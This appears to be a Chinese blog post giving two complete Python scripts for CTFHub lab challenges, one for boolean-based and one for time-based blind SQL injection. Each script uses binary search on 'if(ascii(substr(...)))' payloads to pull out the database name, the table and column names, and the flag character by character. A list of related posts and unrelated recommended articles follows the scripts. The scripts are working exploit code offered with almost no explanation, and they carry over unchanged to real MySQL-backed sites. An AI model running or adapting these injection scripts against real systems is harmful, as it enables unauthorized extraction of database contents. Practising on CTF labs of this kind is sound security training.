布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

时间盲注:

import requests

import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

sql布尔盲注和时间盲注的二分脚本的更多相关文章

  1. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  2. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  3. sqli-labs(五)——盲注(boolean盲注以及时间盲注)

    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常 ...

  4. 依托http-headers的 sql注入和时间盲注

    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...

  5. Sqli-LABS通关笔录-5[SQL布尔型盲注]

    /* 请为原作者打个标记.出自:珍惜少年时 */   通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...

  6. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  7. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  8. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  9. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)

    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...

随机推荐

  1. Java中toCharArray()方法

    Java中 toCharArray() 方法详解 <Thinking in Java>Chapter11中存在下列代码 package holding; import java.util. ...

  2. 面试官写了个双冒号: : 问我这是什么语法?Java中有这玩意?

    一:简洁 方法引用分为三种,方法引用通过一对双冒号:: 来表示,方法引用是一种函数式接口的另一种书写方式 静态方法引用,通过类名::静态方法名, 如 Integer::parseInt 实例方法引用, ...

  3. SpringMVC初始化阶段流程源码分析

    1.都知道SpringMVC项目启动的时候都会初始化一个类:DispatcherServlet,看这个类的源码我们可以发现他其实就是一个servlet, 为什么这么说呢?请看: DispatcherS ...

  4. Spring学习(九)Spring 和数据库编程【了解】

    一.传统 JDBC 回顾 用一个大佬的demo来简单看一下 /** * 使用jdbc,根据id查询单个Student的信息 */ public class JdbcManage { public St ...

  5. 刷题[网鼎杯 2020 朱雀组]phpweb

    解题思路 打开是一个蛮有意思的背景,众生皆懒狗,是自己没错了.源代码看一看,啥都没有.抓个包 诶,一看到func和p两个参数,想到了call_user_func(). 尝试着把date改成system ...

  6. java安全编码指南之:可见性和原子性

    目录 简介 不可变对象的可见性 保证共享变量的复合操作的原子性 保证多个Atomic原子类操作的原子性 保证方法调用链的原子性 读写64bits的值 简介 java类中会定义很多变量,有类变量也有实例 ...

  7. httpclient post推送数据

    客户端代码 /** * 从接口获取数据 * @param url 服务器接口地址 * @param json 传入的参数 若获取全部,此项为空 * @return 返回查询到的数据 * @throws ...

  8. Layman 对PHP源码进行加密保护

    加密软件(php_screw) >下载网站:http://sourceforge.net/projects/php-screw/ >描述:php文件通常以文本格式存贮在服务器端, 很容易被 ...

  9. 005 01 Android 零基础入门 01 Java基础语法 01 Java初识 05 Eclipse简介

    005 01 Android 零基础入门 01 Java基础语法 01 Java初识 05 Eclipse简介 Eclipse是一款集成开发工具--IDE. 集成开发环境(IDE,Integrated ...

  10. 万万没想到!ModelArts与AppCube组CP了

    摘要:嘘,华为云内部都不知道的秘密玩法,我悄悄告诉您! 双"魔"合璧庆双节 ↑开局一张图,故事全靠编 华为云的一站式开发平台ModelArts和应用魔方AppCube居然能玩到一起 ...